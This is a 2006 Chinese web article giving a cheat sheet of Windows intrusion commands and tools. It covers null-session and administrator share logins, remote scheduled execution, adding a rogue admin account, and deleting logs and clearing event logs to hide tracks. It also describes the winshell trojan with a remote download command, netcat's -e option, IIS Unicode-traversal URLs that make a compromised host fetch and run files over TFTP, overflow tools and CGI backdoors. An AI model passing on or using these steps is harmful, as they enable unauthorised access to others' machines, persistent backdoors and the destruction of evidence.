新闻 | 天津 | 民生 | 广电 | 津抖云 | 微视 | 读图 | 文娱 | 体育 | 图事 | 理论 | 志愿 | 专题 | 工作室 | 不良信息举报
教育 | 健康 | 财经 | 地产 | 天津通 | 旅游 | 时尚 | 购物 | 汽车 | IT | 亲子 | 会计 | 访谈 | 场景秀 | 发布系统

"津云"客户端
  您当前的位置 :北方网 > IT浪潮 > 北方学院 > 软件文库 > 系统相关 正文
关键词:

黑客和网管都必须知道的命令


http://www.enorth.com.cn  2006-03-22 11:27

  常用的几条NET命令:

  (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

  (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"

  (传送文件到远程主机WINNT目录下)copy本机目录路径\程序\\IP地址\admin$

  (查看远程主机时间) net time \\IP地址

  (定时启动某个程序) at \\IP地址02:18 readme.exe

  (查看共享) net view \\IP地址

  (查看netbios工作组列表) nbtstat -A IP地址

  (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"

  (这两条把自己增加到管理员组): net user用户名密码/add

  net localgroup Administrators用户名/add

  (断开连接) net use \\IP地址\ipc$ /delete

  扫尾:

  del C:\winnt\system32\logfiles\*.*

  del C:\winnt\ssytem32\config\*.evt

  del C:\winnt\system32\dtclog\*.*

  del C:\winnt\system32\*.log

  del C:\winnt\system32\*.txt

  del C:\winnt\*.txt

  del C:\winnt\*.log

  一、netsvc.exe

  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

  netsvc /list \\IP地址

  netsvc schedule \\IP地址/query

  netsvc \\IP地址schedule /start

  二、OpenTelnet.exe

  远程启动主机的Telnet服务,并绑定端口到7878,例如:

  OpenTelnet \\IP地址用户名密码1 7878

  然后就可以telnet到主机的7878端口,进入DOS方式下:

  telnet IP地址7878

  三、winshell.exe

  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

  p Path (查看winshell主程序的路径信息)

  b reBoot (重新启动机器)

  d shutDown (关闭机器)

  s Shell (执行后你就会看到可爱的“C:\>”)

  x eXit (退出本次登录会话,此命令并不终止winshell的运行)

  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

  四、3389登陆器,GUI方式登录远程主机的

  五、elsave.exe

  事件日志清除工具

  elsave -s \\IP地址-l "application" -C

  elsave -s \\IP地址-l "system" -C

  elsave -s \\IP地址-l "security" -C

  执行后成功清除应用程序日志,系统日志,安全日志

  六、hbulot.exe

  开启win2kserver和winxp的3389服务

  hbulot [/r]

  使用/r表示安装完成后自动重起目标使设置生效。

  七、nc.exe(netcat.exe)

  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

  想要连接到某处: nc [-options] hostname port[s] [ports] ...

  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

  参数:

  -e prog程序重定向,一旦连接,就执行[危险!!]

  -g gateway source-routing hop point[s], up to 8

  -G num source-routing pointer: 4, 8, 12, ...

  -h帮助信息

  -i secs延时的间隔

  -l监听模式,用于入站连接

  -n指定数字的IP地址,不能用hostname

  -o file记录16进制的传输

  -p port本地端口号

  -r任意指定本地及远程端口

  -s addr本地源地址

  -u UDP模式

  -v详细输出——用两个-v可得到更详细的内容

  -w secs timeout的时间

  -z将输入输出关掉——用于扫描时八、TFTPD32.EXE

  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i本机IP地址get文件名c:\winnt\system32\文件名

  然后可以直接令文件运行:

  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

  九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

  一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

  一、一Xscan命令行运行参数说明:

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] xscan -file <主机列表文件名> <检测项目> [其他选项] 其中<检测项目> 含义如下:

  -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);

  -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

  -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

  -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

  -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

  [其他选项]含义如下:

  -v:显示详细扫描进度

  -p:跳过Ping不通的主机

  -o:跳过没有检测到开放端口的主机

-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
编辑 赵海涛
[进入IT论坛]
请您文明上网、理性发言并遵守相关规定,在注册后发表评论。
 北方网精彩内容推荐
无标题文档
天津民生资讯
天气交通 天津福彩 每月影讯 二手市场
空气质量 天津股票 广播节目 二手房源
失物招领 股市大擂台 天视节目 每日房价
热点专题
北京奥运圣火传递和谐之旅 迎奥运 讲文明 树新风
解放思想 干事创业 科学发展 同在一方热土 共建美好家园
2008天津夏季达沃斯论坛 《今日股市观察》视频
北方网网络相声频道在线收听 2008高考招生简章 复习冲刺
天津自然博物馆馆藏精品展示 2008年天津中考问题解答
带你了解08春夏服饰流行趋势 完美塑身 舞动肚皮舞(视频)
C-NCAP碰撞试验—雪佛兰景程 特殊时期善待自己 孕期检查
热点新闻排行 财经 体育 娱乐 汽车 IT 时尚 健康 教育

Copyright (C) 2000-2021 Enorth.com.cn, Tianjin ENORTH NETNEWS Co.,LTD.All rights reserved
本网站由天津北方网版权所有